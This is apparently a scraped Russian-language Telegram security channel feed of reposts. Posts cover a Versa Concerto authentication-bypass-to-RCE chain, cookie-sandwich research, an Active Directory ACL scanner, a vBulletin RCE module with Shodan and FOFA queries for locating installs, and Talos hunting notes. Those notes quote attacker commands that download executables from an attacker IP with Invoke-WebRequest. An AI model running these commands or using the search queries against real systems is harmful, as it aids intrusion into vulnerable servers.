Forwarded from hx0110
Authentication Bypass to RCE in Versa Concerto
На прошедшем phd ребята из project discovery представили несколько своих зиродеев. Сам доклад можно глянуть тут. Одним из таргетов была Versa Concerto:
Их ресёрч вышел совсем недавно, и в нём разобраны отличные находки, которые собираються в красивую цепочку:
1. Auth bypass за счет TOCTOU
2. Примитив записи файла (однако файл быстро удалялся из-за отсутствия токена доступа)
3. Race condition to RCE - имея примитив из п.2, остаеться попасть в race window, загрузив ld.so.preload, ссылающуюся на hook.so, и саму вредоносную либу hook.so, которая будет подгружена.
4. Так как каждые 10 секунд внутри контейнера запускается curl, необходимо, чтобы в момент его запуска и ld.so.preload, и hook.so находились в системе. Как только все условия выполнены — RCE (пока в контейнере).
❗️ Также упоминается уязвимость hop-by-hop headers, которая позволяет получить административный доступ и, например, выполнить п.3 и п.4 без необходимости попадания в race window.
5. Поскольку каталоги /usr/bin и /bin контейнера были примаунчены к одноимённым каталогам хостовой ОС, и на хосте по умолчанию работал cron, появилась возможность перезаписать бинарный файл и добиться его исполнения уже на хосте, что позволило получить RCE на хостовой машине.
Красиво!🔥
Ресерч: https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce
#web #vulns
На прошедшем phd ребята из project discovery представили несколько своих зиродеев. Сам доклад можно глянуть тут. Одним из таргетов была Versa Concerto:
Versa Concerto is a widely used network security and SD-WAN orchestration platform
Их ресёрч вышел совсем недавно, и в нём разобраны отличные находки, которые собираються в красивую цепочку:
1. Auth bypass за счет TOCTOU
2. Примитив записи файла (однако файл быстро удалялся из-за отсутствия токена доступа)
3. Race condition to RCE - имея примитив из п.2, остаеться попасть в race window, загрузив ld.so.preload, ссылающуюся на hook.so, и саму вредоносную либу hook.so, которая будет подгружена.
4. Так как каждые 10 секунд внутри контейнера запускается curl, необходимо, чтобы в момент его запуска и ld.so.preload, и hook.so находились в системе. Как только все условия выполнены — RCE (пока в контейнере).
5. Поскольку каталоги /usr/bin и /bin контейнера были примаунчены к одноимённым каталогам хостовой ОС, и на хосте по умолчанию работал cron, появилась возможность перезаписать бинарный файл и добиться его исполнения уже на хосте, что позволило получить RCE на хостовой машине.
Красиво!
Ресерч: https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce
#web #vulns
Please open Telegram to view this post
VIEW IN TELEGRAM
ProjectDiscovery
Authentication Bypass to RCE in Versa Concerto — ProjectDiscovery Blog
Introduction
Versa Concerto is a widely used network security and SD-WAN orchestration platform, designed to provide seamless policy management, analytics, and automation for enterprises. With a growing customer base that includes large enterprises, service…
Versa Concerto is a widely used network security and SD-WAN orchestration platform, designed to provide seamless policy management, analytics, and automation for enterprises. With a growing customer base that includes large enterprises, service…
👏1
PortSwigger Research
Stealing HttpOnly cookies with the cookie sandwich technique
In this post, I will introduce the "cookie sandwich" technique which lets you bypass the HttpOnly flag on certain servers. This research follows on from Bypassing WAFs with the phantom $Version cookie
Forwarded from Whitehat Lab
Инструмент для аудита разрешений в
доступом (ACL – Access Control List)
UPD
Added info for Windows 2022 and Windows 2025
Added Exchange Schema version 'Exchange Server 2019 CU10
Написан на
SACL - список используемый для аудита доступа к данному объекту.
DACL - список указывающий права пользователей и групп на действия с данным объектом.
Разрешения, которые нам интересны
GenericAll - полные права на объект
GenericWrite - редактировать атрибуты объекта
WriteOwner - изменить владельца объекта
WriteDACL - редактировать ACE объекта
AllExtendedRights - расширенные права на объект
ForceChangePassword - сменить пароль объекта
Self - возможность добавить себя в группу
Работает в GUI или консольном режимах:
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/canix1/ADACLScanner/refs/heads/master/ADACLScan.ps1' -OutFile ADACLScan.ps1
.\ADACLScan.ps1
.\ADACLScan.ps1 -Base (Get-ADRootDSE).defaultNamingContext -Owner -Scope subtree -Filter '(objectClass=*)' | Where-Object {$_.Access -eq 'Owner'}
Экспорт в xls, csv, html
Большое количество возможностей
#adaclscanner #powershell #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 1N73LL1G3NC3
Unauthenticated RCE module for vBulletin 5.1.0-6.0.3
Write-up: https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
Search query:
Write-up: https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
Search query:
ZoomEye: app="vBulletin"
Shodan: http.html:"content=\"vBulletin"
FOFA: app="vBulletin"
www.opennet.ru
Релиз ядра Linux 6.15
После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.15. Среди наиболее заметных изменений: механизм аудита в Landlock, режим закрепления маппинга памяти, подсистема fwctl, драйвер Nova для GPU NVIDIA, реализация хост-системы для гипервизора…
🔗Ссылка:
https://opennet.ru/63305/
https://opennet.ru/63305/
www.opennet.ru
Google оценил возможности квантового компьютера, необходимые для взлома RSA-2048
Компания Google опубликовала результаты прогнозирования возможностей квантового компьютера, необходимого для успешной факторизации параметров 2048-битных RSA-ключей. В ходе исследования был сделан вывод, что теоретически взлом ключа RSA-2048 может быть осуществлён…
🔗Ссылка:
https://opennet.ru/63310/
https://opennet.ru/63310/
Forwarded from Threat Hunting Father 🦔
⚙️ Кампания UAT-6382: эксплуатация 0-day в Cityworks
Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США.
🧰 Инструментарий
🔸 WebShells
AntSword, Chopper (chinatso), Behinder — размещаются в
🔸 TetraLoader (загрузчик на Rust)
Скомпилирован с использованием MaLoader — malware-билдера.
Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`,
🔸 Payloads
Cobalt Strike Beacons — используют HTTPS C2 (например,
VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском.
🔎 Hunting Notes
🔹 Обнаруженные команды:
🔹 Что ещё искать:
PowerShell с
Размещение ASP/ASPX файлов в
Инъекции в
C2-домены
Запросы к URI вроде
Rust-бинарники со встроенным shellcode и артефактами MaLoader
🔗 https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/
🦔 THF
Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США.
🧰 Инструментарий
🔸 WebShells
AntSword, Chopper (chinatso), Behinder — размещаются в
inetpub\wwwroot, используются как бэкдоры.🔸 TetraLoader (загрузчик на Rust)
Скомпилирован с использованием MaLoader — malware-билдера.
Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`,
dllhost.exe, gpupdate.exe`) через `NtMapViewOfSection, RtlCreateUserThread и др.🔸 Payloads
Cobalt Strike Beacons — используют HTTPS C2 (например,
cdn[.]lgaircon[.]xyz`) и маскируются под .js`-запросы.VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском.
🔎 Hunting Notes
🔹 Обнаруженные команды:
cmd.exe /c ipconfig
cmd.exe /c pwd
cmd.exe /c dir
cmd.exe /c dir ..
cmd.exe /c dir c:\
cmd.exe /c dir c:\inetpub
cmd.exe /c tasklist
cmd.exe /c dir c:\inetpub\wwwroot
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite\Assets
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\
cmd.exe /c copy c:\inetpub\wwwroot\CityworksServer\<backup_archives> c:\inetpub\wwwroot\CityworksServer\Uploads\
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/LVLWPH.exe' -OutFile '<путь>\LVLWPH.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/MCUCAT.exe' -OutFile 'C:\windows\temp\z1.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/TJPLYT.exe' -OutFile 'C:\windows\temp\z33.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/z44.exe' -OutFile 'C:\windows\temp\z44.exe'🔹 Что ещё искать:
PowerShell с
Invoke-WebRequest к IP-адресамРазмещение ASP/ASPX файлов в
inetpub\wwwrootИнъекции в
dllhost.exe, gpupdate.exe, notepad.exeC2-домены
Запросы к URI вроде
/jquery-3.3.1.min.js, /owa/... — подделка под легитимный JS-трафикRust-бинарники со встроенным shellcode и артефактами MaLoader
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM